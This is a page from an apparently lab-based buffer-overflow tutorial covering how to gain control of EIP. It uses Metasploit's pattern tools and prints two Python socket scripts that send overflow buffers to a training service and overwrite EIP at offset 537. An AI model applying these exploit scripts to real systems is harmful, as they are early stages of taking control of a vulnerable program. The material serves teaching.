Controlling the EIP

To take control of the EIP, we first need to locate the EIP’s exact position in the buffer of 600. To do this we will make use of a tool called “msf-pattern_create”.

Creating Pattern

msf-pattern_create -l 600

Update POC

After creating the pattern, modify the code from the previous iteration (Crasher.py) to send the newly generated pattern as the buffer instead.

controllingEip.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Controlling Eip

python controllingEip.py

EIP = 41397241

Further inspecting the registers, as shown above, reveals that our EIP now has a unique value instead of the 4 bytes of “\x41” OR “A” we saw in the previous iteration.

Locating EIP

Now that we have sent in our custom pattern and extracted the value @ EIP, we have to figure out where that is in the buffer. The tool ”msf-pattern_offset” will help us with that.

msf-pattern_offset -l 600 -q 41397241

EIP Was found at 537 Bytes

controlledEip.py

Now let's verify that by further modifying our initial code, we are able to write 4 Bs OR 4 bytes of \x42 into the EIP.

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537
    eip = "B" * 4
    buffer = prefix + filler + eip

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Controlled Eip

python controlledEip.py

After running the new exploit code, we are able to see that we have successfully over-written the EIP with \x42\x42\x42\x42. Now we have gained control of the EIP and are ready to move on to the next step.

PreviousCrashing the Application NextFinding Bad Characters

Last updated 3 years ago